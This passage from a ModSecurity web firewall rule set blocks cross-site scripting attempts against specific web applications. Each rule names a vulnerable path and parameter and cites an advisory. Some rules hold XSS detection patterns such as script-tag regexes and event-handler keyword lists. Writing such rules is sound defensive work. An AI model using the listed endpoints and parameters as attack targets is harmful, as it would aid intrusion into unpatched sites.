"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003908,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form cat',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23834'" SecRule &TX:'/XSS.*ARGS:form[cat]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form cat',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003909) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form cat SecRule REQUEST_LINE "@contains /action_create/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003909,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form cat',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23834'" SecRule &TX:'/XSS.*ARGS:form[cat]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form cat',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003910) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form name SecRule REQUEST_LINE "@contains /action_create/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003910,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form name',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23834'" SecRule &TX:'/XSS.*ARGS:form[name]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form name',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003911) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form message SecRule REQUEST_LINE "@contains /action_create/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003911,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form message',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23834'" SecRule &TX:'/XSS.*ARGS:form[message]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form message',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003912) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form mail SecRule REQUEST_LINE "@contains /newsletter/create/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003912,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form mail',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23834'" SecRule &TX:'/XSS.*ARGS:form[mail]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form mail',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003886) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS All In One Control Panel (AIOCP) XSS Attempt -- cp_authorization.php SecRule REQUEST_LINE "@contains /shared/code/cp_authorization.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003886,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS All In One Control Panel (AIOCP) XSS Attempt -- cp_authorization.php',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/1637'" SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS All In One Control Panel (AIOCP) XSS Attempt -- cp_authorization.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003887) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS All In One Control Panel (AIOCP) XSS Attempt -- cp_config.php SecRule REQUEST_LINE "@contains /shared/config/cp_config.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003887,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS All In One Control Panel (AIOCP) XSS Attempt -- cp_config.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23790'" SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS All In One Control Panel (AIOCP) XSS Attempt -- cp_config.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010862) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible APC Network Management Card Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /Forms/login" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010862,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible APC Network Management Card Cross Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2009-1798'" SecRule &TX:'/XSS.*ARGS:login_username/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible APC Network Management Card Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004594) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASP-Nuke XSS Attempt -- news.asp id SecRule REQUEST_LINE "@contains /news.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004594,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS ASP-Nuke XSS Attempt -- news.asp id',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24135'" SecRule &TX:'/XSS.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASP-Nuke XSS Attempt -- news.asp id',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003915) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Advanced Guestbook XSS Attempt -- picture.php picture SecRule REQUEST_LINE "@contains /picture.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003915,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Advanced Guestbook XSS Attempt -- picture.php picture',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23873'" SecRule &TX:'/XSS.*ARGS:picture/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Advanced Guestbook XSS Attempt -- picture.php picture',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010146) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Apache Tomcat Host Manager Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /host-manager/html/add" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010146,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Apache Tomcat Host Manager Cross Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2008-1947'" SecRule &TX:'/XSS.*ARGS:method/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Apache Tomcat Host Manager Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011114) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ARISg errmsg Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /Aris/wflogin.jsp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011114,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS ARISg errmsg Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,38441'" SecRule &TX:'/XSS.*ARGS:errmsg/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ARISg errmsg Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010082) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible AWStats awstats.pl Cross-Site Scripting Attempt SecRule REQUEST_LINE "@contains /awstats/awstats.pl" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010082,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible AWStats awstats.pl Cross-Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2008-3714'" SecRule &TX:'/XSS.*ARGS:config/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible AWStats awstats.pl Cross-Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010147) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible bloofoxCMS 'search' Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /search.5.html" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010147,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible bloofoxCMS \'search\' Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36700/info'" SecRule &TX:'/XSS.*ARGS:search/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible bloofoxCMS \'search\' Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004583) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BoastMachine XSS Attempt -- index.php blog SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004583,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS BoastMachine XSS Attempt -- index.php blog',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24156'" SecRule &TX:'/XSS.*ARGS:blog/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BoastMachine XSS Attempt -- index.php blog',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004559) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CactuSoft Parodia XSS Attempt -- cand_login.asp strJobIDs SecRule REQUEST_LINE "@contains /cand_login.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004559,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS CactuSoft Parodia XSS Attempt -- cand_login.asp strJobIDs',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24078'" SecRule &TX:'/XSS.*ARGS:strJobIDs/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CactuSoft Parodia XSS Attempt -- cand_login.asp strJobIDs',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011054) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible CactuShop User Invoices Persistent XSS Attempt SecRule REQUEST_LINE "@contains _invoice.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011054,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible CactuShop User Invoices Persistent XSS Attempt',tag:'web-application-attack',tag:'cve,2010-1486'" SecRule REQUEST_LINE "@contains script>" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:(alert|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible CactuShop User Invoices Persistent XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004569) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CandyPress Store XSS Attempt -- prodList.asp brand SecRule REQUEST_LINE "@contains /scripts/prodList.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004569,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS CandyPress Store XSS Attempt -- prodList.asp brand',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/25370'" SecRule &TX:'/XSS.*ARGS:brand/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CandyPress Store XSS Attempt -- prodList.asp brand',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004570) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CandyPress Store XSS Attempt -- prodList.asp Msg SecRule REQUEST_LINE "@contains /scripts/prodList.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004570,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS CandyPress Store XSS Attempt -- prodList.asp Msg',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/25370'" SecRule &TX:'/XSS.*ARGS:Msg/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CandyPress Store XSS Attempt -- prodList.asp Msg',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011676) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Cisco Collaboration Server LoginPage.jhtml Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /webline/html/admin/wcs/LoginPage.jhtml" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011676,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Cisco Collaboration Server LoginPage.jhtml Cross Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2010-0641'" SecRule &TX:'/XSS.*ARGS:dest/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Cisco Collaboration Server LoginPage.jhtml Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2009590) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Citrix XenCenterWeb edituser.php XSS attempt SecRule REQUEST_LINE "@contains /config/edituser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009590,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Citrix XenCenterWeb edituser.php XSS attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/XSS.*ARGS:username/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Citrix XenCenterWeb edituser.php XSS attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2009591) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Citrix XenCenterWeb console.php XSS attempt SecRule REQUEST_LINE "@contains /console.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009591,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Citrix XenCenterWeb console.php XSS attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/XSS.*ARGS:vmname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Citrix XenCenterWeb console.php XSS attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2009592) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Citrix XenCenterWeb forcesd.php XSS attempt SecRule REQUEST_LINE "@contains /forcesd.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009592,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Citrix XenCenterWeb forcesd.php XSS attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/XSS.*ARGS:vmname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Citrix XenCenterWeb forcesd.php XSS attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2009593) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Citrix XenCenterWeb forcerestart.php XSS attempt SecRule REQUEST_LINE "@contains /forcerestart.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009593,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Citrix XenCenterWeb forcerestart.php XSS attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/XSS.*ARGS:vmname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Citrix XenCenterWeb forcerestart.php XSS attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004566) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClientExec (CE) XSS Attempt -- index.php ticketID SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004566,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS ClientExec (CE) XSS Attempt -- index.php ticketID',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24061'" SecRule &TX:'/XSS.*ARGS:ticketID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClientExec (CE) XSS Attempt -- index.php ticketID',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004567) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClientExec (CE) XSS Attempt -- index.php view SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004567,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS ClientExec (CE) XSS Attempt -- index.php view',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24061'" SecRule &TX:'/XSS.*ARGS:view/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClientExec (CE) XSS Attempt -- index.php view',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004568) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClientExec (CE) XSS Attempt -- index.php fuse SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004568,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS ClientExec (CE) XSS Attempt -- index.php fuse',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24061'" SecRule &TX:'/XSS.*ARGS:fuse/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClientExec (CE) XSS Attempt -- index.php fuse',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004591) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClonusWiki XSS Attempt -- index.php query SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004591,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS ClonusWiki XSS Attempt -- index.php query',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469230/100/0/threaded'" SecRule &TX:'/XSS.*ARGS:query/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClonusWiki XSS Attempt -- index.php query',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010200) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Computer Associates SiteMinder Web Agent Smpwservices.FCC Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /siteminderagent/forms/smpwservices.fcc" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010200,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Computer Associates SiteMinder Web Agent Smpwservices.FCC Cross Site Scripting Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/26375/info'" SecRule QUERY_STRING|REQUEST_BODY "(?i:(script|img|src|alert|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Computer Associates SiteMinder Web Agent Smpwservices.FCC Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011152) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Consona Products n6plugindestructor.asp Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /verify/asp/n6plugindestructor.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011152,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Consona Products n6plugindestructor.asp Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,39999'" SecRule &TX:'/XSS.*ARGS:backurl/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Consona Products n6plugindestructor.asp Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004584) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DGNews XSS Attempt -- footer.php copyright SecRule REQUEST_LINE "@contains /footer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004584,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS DGNews XSS Attempt -- footer.php copyright',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24200'" SecRule &TX:'/XSS.*ARGS:copyright/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DGNews XSS Attempt -- footer.php copyright',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004585) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DGNews XSS Attempt -- news.php catid SecRule REQUEST_LINE "@contains /news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004585,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS DGNews XSS Attempt -- news.php catid',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24201'" SecRule &TX:'/XSS.*ARGS:catid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DGNews XSS Attempt -- news.php catid',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003920) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DVDdb XSS Attempt -- loan.php movieid SecRule REQUEST_LINE "@contains /loan.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003920,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS DVDdb XSS Attempt -- loan.php movieid',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23764'" SecRule &TX:'/XSS.*ARGS:movieid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DVDdb XSS Attempt -- loan.php movieid',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003921) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DVDdb XSS Attempt -- listmovies.php s SecRule REQUEST_LINE "@contains /listmovies.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003921,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS DVDdb XSS Attempt -- listmovies.php s',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23764'" SecRule &TX:'/XSS.*ARGS:s/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DVDdb XSS Attempt -- listmovies.php 